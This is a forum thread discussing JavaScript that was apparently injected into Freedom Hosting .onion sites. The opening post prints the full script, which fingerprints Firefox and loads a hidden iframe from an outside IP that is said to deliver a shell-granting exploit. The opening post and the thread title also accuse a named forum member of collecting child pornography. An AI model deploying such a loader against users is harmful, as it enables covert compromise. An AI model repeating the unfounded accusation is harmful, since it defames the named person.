Results 1 to 12 of 12

Thread: 50% of all pedo sites on TOR compromised by FBI, Rollo cant decide if he should shit or go blind first

  1. #1
    Plutonium sonatine's Avatar
    Reputation
    7369
    Join Date
    Mar 2012
    Posts
    33,370
    Load Metric
    65659949

    50% of all pedo sites on TOR compromised by FBI, Rollo cant decide if he should shit or go blind first

    It doesnt matter really because neither is going to keep Rollo Tomasi out of jail for collecting child pornography, which is how he blows off steam after he gets stomped into wine every time he opens his mouth on the forum.

    Anyway, a TOR user cruising an .onion site noticed some strange traffic on his network and discovered that half the sites at least on "freedom hosting" aka .onion were serving this code:

    Code:
    function createCookie(name,value,minutes) {
            if (minutes) {
                    var date = new Date();
                    date.setTime(date.getTime()+(minutes*60*1000));
                    var expires = "; expires="+date.toGMTString();
            }
            else var expires = "";
            document.cookie = name+"="+value+expires+"; path=/";
    }
     
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i < ca.length;i++) {
            var c = ca[i];
            while (c.charAt(0)==' ') c = c.substring(1,c.length);
            if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }
     
    function isFF() {
        return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
    }
     
    function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
        iframe.height = "5";
        iframe.width = "*";
        document.body.appendChild(iframe);
    }
     
    function freedomhost() {
        if ( ! readCookie("n_serv") ) {
            createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
            updatify();
        }
    }
     
    function isReady()
    {
        if ( document.readyState === "interactive" || document.readyState === "complete" ) {
       
            if ( isFF() ) {
                //window.alert(window.location + "Firefox Detected.")
                freedomhost();
            }
        }
        else
        {
            setTimeout(isReady, 250);
        }
    }
    setTimeout(isReady, 250);
    Basically that checks to see if youre running the most popular TOR bundled version of Firefox on Windows.

    Which, inexplicably, no longer disables javascript by default.

    If so, this iframe is served:

    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";

    And a javascript exploit is delivered to the TOR browser, affording the remote actor shell access to your computer.

    Given the recent success at the FBI with gaining access to TOR pedo rings, it should be obvious whose sitting at ip 65.222.202.53.

    So basically if youre running TOR and you view anything on .onion, youre machine gets prawned by FBI.

    TORs response is basically "we are TOR, they are Freedom Hosting, this is between yall, we are looking into patching that exploit one of these days if we can.", so it sounds like TOR is basically perfectly ok with Rollo and his pedo ilk getting flushed down the drain.

    But Im totally sure silk road is secure.

    "Birds born in a cage think flying is an illness." - Alejandro Jodorowsky

    "America is not so much a nightmare as a non-dream. The American non-dream is precisely a move to wipe the dream out of existence. The dream is a spontaneous happening and therefore dangerous to a control system set up by the non-dreamers." -- William S. Burroughs

  2. #2
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Load Metric
    65659949
    Wasn't TOR developed by the government in the first place?

    Pretty LOL that people use it to commit crimes and think they're anonymous.

  3. #3
    Plutonium sonatine's Avatar
    Reputation
    7369
    Join Date
    Mar 2012
    Posts
    33,370
    Load Metric
    65659949
    Yeah it was 100%, but its like crypto; even if you develop a high end algorithm, it doesnt mean you can compromise it. In fact the only way to attack the TOR protocol is to compromise nodes (which has also been done btw). Once you can view traffic taking place on a statistically significant number of TOR nodes, you can basically match an internal stream with a stream hitting a TOR access point, is my understanding.

    But breaking into the largest multi-tenant site host on the TOR network and dishing out browser based exploits to anyone viewing them is Serious Business and a quantum leap from passive monitoring to active exploitation and enumeration.
    "Birds born in a cage think flying is an illness." - Alejandro Jodorowsky

    "America is not so much a nightmare as a non-dream. The American non-dream is precisely a move to wipe the dream out of existence. The dream is a spontaneous happening and therefore dangerous to a control system set up by the non-dreamers." -- William S. Burroughs

  4. #4
    Platinum Rollo Tomasi's Avatar
    Reputation
    -106
    Join Date
    Mar 2012
    Location
    Gulfstream Park
    Posts
    2,817
    Load Metric
    65659949

  5. #5
    Gold anonamoose's Avatar
    Reputation
    127
    Join Date
    May 2012
    Posts
    2,038
    Load Metric
    65659949
    I never understood the logic behind people going "Oh, the government can't find me if I use this prepackaged software that everybody knows about? Sounds like there's nothing that can go wrong."

    I've never used TOR and I never plan to use TOR because I think it just screams "Look at me! I'm probably doing something illegal." more than anything. Even if I used it just for privacy there's just way too much shit on that network that's bad to justify using it vs. other means of privacy.

  6. #6
    Platinum DirtyB's Avatar
    Reputation
    664
    Join Date
    Mar 2012
    Posts
    2,927
    Load Metric
    65659949
    Quote Originally Posted by anonamoose View Post
    I never understood the logic behind people going "Oh, the government can't find me if I use this prepackaged software that everybody knows about? Sounds like there's nothing that can go wrong."

    I've never used TOR and I never plan to use TOR because I think it just screams "Look at me! I'm probably doing something illegal." more than anything. Even if I used it just for privacy there's just way too much shit on that network that's bad to justify using it vs. other means of privacy.
    In theory, software that everyone knows about can be secure using strong cryptography. And in theory, millions of eyes are reviewing all of the code involved and patching vulnerabilities. But as we've seen, all of this shit is laughably low rent. These super hackers had Javascript enabled, and it took months for someone to notice this suspicious traffic?

  7. #7
    PFA Emeritus Crowe Diddly's Avatar
    Reputation
    1954
    Join Date
    Mar 2012
    Posts
    6,682
    Load Metric
    65659949
    Rather insane to read that the javascript was turned on so as to allow better user experiences with tor and shit, to make the browser more useful. To use that as a reason, and to get away with it, blows my mind. Yes, improve the user experience in all manners, except the one they're using tor for in the 1st place. Fuck it, they should just make it automatically log into your google account, so you have the web history convenience as well, for a better customer experience and whatnot.

    This ain't the 1st time the tor/firefox shit has been screwed with, in the name if de-pedo'ing the secret services. Last time it was the mozilla foundation itself, along with anonymous.

  8. #8
    Plutonium sonatine's Avatar
    Reputation
    7369
    Join Date
    Mar 2012
    Posts
    33,370
    Load Metric
    65659949
    At worse, the odds are 50/50 that the devs were pressured into enabling it or offered to do so in order to assist.

    Its almost impossible to believe that they did so for aesthetic reasons.
    "Birds born in a cage think flying is an illness." - Alejandro Jodorowsky

    "America is not so much a nightmare as a non-dream. The American non-dream is precisely a move to wipe the dream out of existence. The dream is a spontaneous happening and therefore dangerous to a control system set up by the non-dreamers." -- William S. Burroughs

  9. #9
    Photoballer 4Dragons's Avatar
    Reputation
    2686
    Join Date
    Apr 2012
    Location
    Detroit
    Posts
    10,648
    Load Metric
    65659949
    So does this mean Micon is screwed for using Silk Road?

  10. #10
    Plutonium sonatine's Avatar
    Reputation
    7369
    Join Date
    Mar 2012
    Posts
    33,370
    Load Metric
    65659949
    Quote Originally Posted by 4Dragons View Post
    So does this mean Micon is screwed for using Silk Road?

    "Birds born in a cage think flying is an illness." - Alejandro Jodorowsky

    "America is not so much a nightmare as a non-dream. The American non-dream is precisely a move to wipe the dream out of existence. The dream is a spontaneous happening and therefore dangerous to a control system set up by the non-dreamers." -- William S. Burroughs

  11. #11
    Canadrunk limitles's Avatar
    Reputation
    1653
    Join Date
    Mar 2012
    Location
    In Todd's head
    Posts
    17,637
    Blog Entries
    1
    Load Metric
    65659949
    That's an odd thread title. 50% compromised? So they let the other half go uncompromised?

  12. #12
    Plutonium simpdog's Avatar
    Reputation
    1959
    Join Date
    May 2012
    Posts
    10,556
    Load Metric
    65659949
    Lol at 4dragons posting in this thread.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Rollo Tomasi speaks out!
    By bottomset_69 in forum Flying Stupidity
    Replies: 0
    Last Post: 05-17-2013, 03:32 AM
  2. i stole a guys 1 dollar small blind
    By Zap_the_Fractions_Giraffe in forum Flying Stupidity
    Replies: 19
    Last Post: 02-28-2013, 05:08 PM
  3. Replies: 32
    Last Post: 02-04-2013, 12:44 AM
  4. Pedo-Reservations for pedophiles?
    By NaturalBornHustler in forum Flying Stupidity
    Replies: 12
    Last Post: 12-28-2012, 01:57 PM
  5. For the blind scot who apparently cannot read
    By 408Mike in forum Flying Stupidity
    Replies: 4
    Last Post: 03-15-2012, 08:38 AM